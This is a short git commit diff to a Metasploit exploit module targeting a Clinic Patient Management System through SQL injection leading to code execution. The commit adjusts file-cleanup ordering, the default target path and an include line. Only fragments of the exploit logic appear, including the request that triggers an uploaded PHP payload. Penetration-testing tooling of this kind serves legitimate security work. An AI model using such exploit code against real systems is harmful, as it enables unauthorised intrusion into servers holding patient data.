Fixes file cleanup

msutovsky-r7 · msutovsky-r7 · commit 1d6ec73a3c02 · 2025-05-21T09:05:41.000+02:00
diff --git a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::PhpEXE
   include Msf::Exploit::FileDropper
-  include Msf::Post::File
+  # include Msf::Post::File
   include Msf::Auxiliary::Report
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -47,7 +47,7 @@ def initialize(info = {})
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
+      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms/']),
       OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', true])
     ])
   end
@@ -181,12 +181,12 @@ def trigger_payload
 
     fail_with Failure::PayloadFailed, 'Cannot find path to payload' if payload_path.blank?
 
+    register_file_for_cleanup(File.basename(payload_path)) if datastore['DELETE_FILES']
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, payload_path),
       'method' => 'GET',
       'keep_cookies' => true
     })
-    register_file_for_cleanup(File.basename(payload_path)) if datastore['DELETE_FILES']
   end
 
   def exploit
